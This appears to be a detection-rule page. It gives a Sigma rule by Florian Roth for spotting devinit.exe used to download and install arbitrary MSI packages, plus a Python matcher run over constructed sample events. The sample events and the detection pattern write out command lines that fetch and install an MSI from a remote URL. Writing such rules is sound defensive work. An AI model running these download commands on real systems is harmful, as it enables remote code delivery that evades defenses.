Arbitrary MSI Download Via Devinit.EXE
Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
Sigma rule
```yaml
title: Arbitrary MSI Download Via Devinit.EXE
id: 90d50722-0483-4065-8e35-57efaadd354d
status: test
description: Detects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
references:
    - https://twitter.com/mrd0x/status/1460815932402679809
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devinit/
author: Florian Roth (Nextron Systems)
date: 2022-01-11
modified: 2023-04-06
tags:
    - attack.execution
    - attack.defense-evasion
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - ' -t msi-install '
            - ' -i http'
    condition: selection
falsepositives:
    - Unknown
level: medium
```
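To show what the selection above actually matches, here is an added Python matcher (not part of the Sigma rule or its project) that applies the rule's `CommandLine|contains|all` check, with Sigma's default case-insensitive matching, to constructed process_creation events; the devinit command syntax and image paths are assumptions.

```python
"""Evaluate the rule's 'CommandLine|contains|all' selection over constructed events.
Added example, not part of the Sigma rule; Sigma string matching is case-insensitive
by default, which the matcher mirrors."""

# Values copied from the rule's selection; the surrounding spaces are part of each match.
SELECTION_CONTAINS_ALL = [" -t msi-install ", " -i http"]


def matches_rule(event: dict) -> bool:
    """True when every selection substring occurs in CommandLine (case-insensitive).
    The rule keys on CommandLine only, so the Image field is never consulted."""
    cmdline = event.get("CommandLine", "").lower()
    return all(needle.lower() in cmdline for needle in SELECTION_CONTAINS_ALL)


# Constructed sample events (not real telemetry); paths and URLs are hypothetical.
SAMPLE_EVENTS = [
    # 1. Plain invocation with the assumed 'run -t msi-install -i <url>' syntax: match.
    {"Image": r"C:\Tools\devinit.exe",
     "CommandLine": r"devinit.exe run -t msi-install -i http://example.invalid/pkg.msi"},
    # 2. Upper-case flags via cmd.exe: still a match, since Image is ignored and
    #    matching is case-insensitive.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c DEVINIT.EXE run -T MSI-INSTALL -I HTTPS://example.invalid/p.msi"},
    # 3. Local MSI path instead of a URL: ' -i http' is absent, so no match.
    {"Image": r"C:\Tools\devinit.exe",
     "CommandLine": r"devinit.exe run -t msi-install -i C:\packages\local.msi"},
    # 4. Flag value without the trailing space ('msi-install-x'): the quoted
    #    ' -t msi-install ' token is absent, so no match.
    {"Image": r"C:\Tools\devinit.exe",
     "CommandLine": r"devinit.exe run -t msi-install-x -i http://example.invalid/"},
]


def evaluate(events):
    """Apply the rule to each event and return the list of verdicts."""
    return [matches_rule(e) for e in events]


if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print("ALERT " if hit else "ignore", event["CommandLine"])
```

Event 2 illustrates why the rule does not depend on the process image: only the command line string is inspected.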
Related rules
- Arbitrary File Download Via MSOHTMED.EXE
- Arbitrary File Download Via MSPUB.EXE
- Arbitrary File Download Via PresentationHost.EXE
- Created Files by Microsoft Sync Center
- Execute MSDT Via Answer File